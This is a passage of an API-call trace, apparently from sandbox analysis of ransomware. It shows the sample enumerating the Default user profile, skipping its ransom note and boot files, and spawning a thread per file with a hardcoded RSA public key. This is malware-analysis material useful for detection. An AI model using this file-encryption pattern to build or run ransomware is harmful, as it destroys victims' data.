returned="C:\\Users\\Default\\*.*" [0257.595] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\*.*", lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 0x3cdea18 [0257.595] PathFindFileNameW (pszPath="C:\\Users\\Default") returned="Default" [0257.595] lstrcpyW (in: lpString1=0x17d784, lpString2="Default" | out: lpString1="Default") returned="Default" [0257.595] StrStrW (lpFirst="NTUSER.DAT", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0257.596] StrStrW (lpFirst="NTUSER.DAT", lpSrch="ntldr") returned 0x0 [0257.596] StrStrW (lpFirst="NTUSER.DAT", lpSrch="NTLDR") returned 0x0 [0257.596] StrStrW (lpFirst="NTUSER.DAT", lpSrch="NTDETECT.COM") returned 0x0 [0257.596] StrStrW (lpFirst="NTUSER.DAT", lpSrch="ntdetect.com") returned 0x0 [0257.596] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="Desktop") returned 0x0 [0257.596] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="DESKTOP") returned 0x0 [0257.596] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0257.596] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0257.596] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT" | out: lpString1="NTUSER.DAT") returned="NTUSER.DAT" [0257.596] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0257.596] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x14ac [0257.596] Sleep (dwMilliseconds=0x96) [0257.748] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0257.748] lstrcmpW (lpString1="NTUSER.DAT.LOG", lpString2="..") returned 1 [0257.748] lstrcmpW (lpString1="NTUSER.DAT.LOG", lpString2=".") returned 1 [0257.748] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0257.749] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch="ntldr") returned 0x0 [0257.749] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch="NTLDR") returned 0x0 [0257.749] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch="NTDETECT.COM") returned 0x0 [0257.749] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch="ntdetect.com") returned 0x0 [0257.749] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="Desktop") returned 0x0 [0257.749] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="DESKTOP") returned 0x0 [0257.749] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0257.749] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0257.749] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT.LOG" | out: lpString1="NTUSER.DAT.LOG") returned="NTUSER.DAT.LOG" [0257.749] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0257.749] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x14b0 [0257.749] Sleep (dwMilliseconds=0x96) [0257.904] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0257.904] lstrcmpW (lpString1="NTUSER.DAT.LOG1", lpString2="..") returned 1 [0257.904] lstrcmpW (lpString1="NTUSER.DAT.LOG1", lpString2=".") returned 1 [0257.905] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0257.905] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch="ntldr") returned 0x0 [0257.905] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch="NTLDR") returned 0x0 [0257.905] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch="NTDETECT.COM") returned 0x0 [0257.905] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch="ntdetect.com") returned 0x0 [0257.905] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="Desktop") returned 0x0 [0257.905] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="DESKTOP") returned 0x0 [0257.905] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0257.905] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0257.905] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT.LOG1" | out: lpString1="NTUSER.DAT.LOG1") returned="NTUSER.DAT.LOG1" [0257.905] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0257.905] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x14b4 [0257.905] Sleep (dwMilliseconds=0x96) [0258.064] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0258.064] lstrcmpW (lpString1="NTUSER.DAT.LOG2", lpString2="..") returned 1 [0258.064] lstrcmpW (lpString1="NTUSER.DAT.LOG2", lpString2=".") returned 1 [0258.064] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0258.064] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch="ntldr") returned 0x0 [0258.064] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch="NTLDR") returned 0x0 [0258.064] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch="NTDETECT.COM") returned 0x0 [0258.064] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch="ntdetect.com") returned 0x0 [0258.064] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="Desktop") returned 0x0 [0258.064] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="DESKTOP") returned 0x0 [0258.064] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0258.064] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0258.064] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT.LOG2" | out: lpString1="NTUSER.DAT.LOG2") returned="NTUSER.DAT.LOG2" [0258.064] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0258.064] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x14b8 [0258.065] Sleep (dwMilliseconds=0x96) [0258.216] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0258.216] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="..") returned 1 [0258.216] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".") returned 1 [0258.216] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0258.216] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="ntldr") returned 0x0 [0258.217] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="NTLDR") returned 0x0 [0258.217] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="NTDETECT.COM") returned 0x0 [0258.217] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="ntdetect.com") returned 0x0 [0258.217] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="Desktop") returned 0x0 [0258.217] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="DESKTOP") returned 0x0 [0258.217] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0258.217] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0258.217] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" [0258.217] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0258.217] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x14bc [0258.217] Sleep (dwMilliseconds=0x96) [0258.372] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0258.372] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1 [0258.372] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1 [0258.372] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0258.373] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="ntldr") returned 0x0 [0258.373] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="NTLDR") returned 0x0 [0258.373] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="NTDETECT.COM") returned 0x0 [0258.373] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="ntdetect.com") returned 0x0 [0258.373] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="Desktop") returned 0x0 [0258.373] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="DESKTOP") returned 0x0 [0258.373] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0258.373] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0258.373] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" [0258.373] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0258.373] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x14c0 [0258.373] Sleep (dwMilliseconds=0x96) [0258.528] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0258.528] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1 [0258.529] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1 [0258.529] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0258.529] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="ntldr") returned 0x0 [0258.529] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="NTLDR") returned 0x0 [0258.529] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="NTDETECT.COM") returned 0x0 [0258.529] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="ntdetect.com") returned 0x0 [0258.529] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="Desktop") returned 0x0 [0258.529] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="DESKTOP") returned 0x0 [0258.529] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0258.529] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0258.529] lstrcpyW (in: lpString1=0x17dfbc, lpString2="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" | out: lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" [0258.529] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0258.529] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x14c4 [0258.529] Sleep (dwMilliseconds=0x96) [0258.684] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0258.685] lstrcmpW (lpString1="ntuser.ini", lpString2="..") returned 1 [0258.685] lstrcmpW (lpString1="ntuser.ini", lpString2=".") returned 1 [0258.685] StrStrW (lpFirst="ntuser.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0258.685] StrStrW (lpFirst="ntuser.ini", lpSrch="ntldr") returned 0x0 [0258.685] StrStrW (lpFirst="ntuser.ini", lpSrch="NTLDR") returned 0x0 [0258.685] StrStrW (lpFirst="ntuser.ini", lpSrch="NTDETECT.COM") returned 0x0 [0258.685] StrStrW (lpFirst="ntuser.ini", lpSrch="ntdetect.com") returned 0x0 [0258.685] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="Desktop") returned 0x0 [0258.685] StrStrW (lpFirst="C:\\Users\\Default\\", lpSrch="DESKTOP") returned 0x0 [0258.685] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Default\\") returned 21 [0258.685] lstrcpyA (in: lpString1=0x17d9bc, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0258.685] lstrcpyW (in: lpString1=0x17dfbc, lpString2="ntuser.ini" | out: lpString1="ntuser.ini") returned="ntuser.ini" [0258.685] lstrcpyW (in: lpString1=0x17dbbc, lpString2="\\\\?\\C:\\Users\\Default\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\") returned="\\\\?\\C:\\Users\\Default\\" [0258.685] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17d9bc, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x14c8 [0258.685] Sleep (dwMilliseconds=0x96) [0258.840] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0258.840] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0258.840] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0258.840] FindNextFileW (in: hFindFile=0x3cdea18, lpFindFileData=0x17e3c0 | 